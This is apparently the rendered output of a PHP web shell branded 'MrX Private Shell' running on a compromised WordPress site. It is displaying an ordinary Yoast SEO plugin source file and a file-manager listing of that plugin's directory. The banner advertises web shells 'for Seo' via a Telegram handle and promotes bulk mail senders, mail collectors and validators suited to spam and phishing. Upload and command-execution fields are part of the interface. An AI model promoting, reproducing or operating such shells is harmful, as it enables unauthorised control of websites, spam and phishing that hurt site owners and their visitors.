__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * WPSEO plugin file.
 *
 * @package WPSEO\Internals
 * @since   7.7
 */

/**
 * Class WPSEO_Replacement_Variable.
 *
 * This class stores the data of a single snippet variable.
 */
class WPSEO_Replacement_Variable {

	/**
	 * The variable to use.
	 *
	 * @var string
	 */
	protected $variable;

	/**
	 * The label of the replacement variable.
	 *
	 * @var string
	 */
	protected $label;

	/**
	 * The description of the replacement variable.
	 *
	 * @var string
	 */
	protected $description;

	/**
	 * WPSEO_Replacement_Variable constructor.
	 *
	 * @param string $variable    The variable that is replaced.
	 * @param string $label       The label of the replacement variable.
	 * @param string $description The description of the replacement variable.
	 */
	public function __construct( $variable, $label, $description ) {
		$this->variable    = $variable;
		$this->label       = $label;
		$this->description = $description;
	}

	/**
	 * Returns the variable to use.
	 *
	 * @return string
	 */
	public function get_variable() {
		return $this->variable;
	}

	/**
	 * Returns the label of the replacement variable.
	 *
	 * @return string
	 */
	public function get_label() {
		return $this->label;
	}

	/**
	 * Returns the description of the replacement variable.
	 *
	 * @return string
	 */
	public function get_description() {
		return $this->description;
	}
}

Filemanager

Name Type Size Permission Actions
exceptions Folder 0775
options Folder 0775
sitemaps Folder 0775
class-addon-manager.php File 26.07 KB 0775
class-my-yoast-api-request.php File 4.78 KB 0775
class-post-type.php File 3.89 KB 0775
class-rewrite.php File 7.58 KB 0775
class-upgrade-history.php File 3.05 KB 0775
class-upgrade.php File 54.83 KB 0775
class-wpseo-admin-bar-menu.php File 26.54 KB 0775
class-wpseo-content-images.php File 2.62 KB 0775
class-wpseo-custom-fields.php File 1.72 KB 0775
class-wpseo-custom-taxonomies.php File 1.59 KB 0775
class-wpseo-image-utils.php File 15.09 KB 0775
class-wpseo-installation.php File 1.11 KB 0775
class-wpseo-meta.php File 34.14 KB 0775
class-wpseo-primary-term.php File 1.7 KB 0775
class-wpseo-rank.php File 7.37 KB 0775
class-wpseo-replace-vars.php File 51.4 KB 0775
class-wpseo-replacement-variable.php File 1.34 KB 0775
class-wpseo-shortlinker.php File 1.11 KB 0775
class-wpseo-statistics.php File 1.41 KB 0775
class-wpseo-utils.php File 28.53 KB 0775
class-yoast-dynamic-rewrites.php File 5.24 KB 0775
date-helper.php File 1.71 KB 0775
index.php File 38 B 0775
interface-wpseo-wordpress-ajax-integration.php File 294 B 0775
interface-wpseo-wordpress-integration.php File 348 B 0775
language-utils.php File 1.28 KB 0775
wpseo-functions-deprecated.php File 68 B 0775
wpseo-functions.php File 9 KB 0775
wpseo-non-ajax-functions.php File 1.56 KB 0775
Filemanager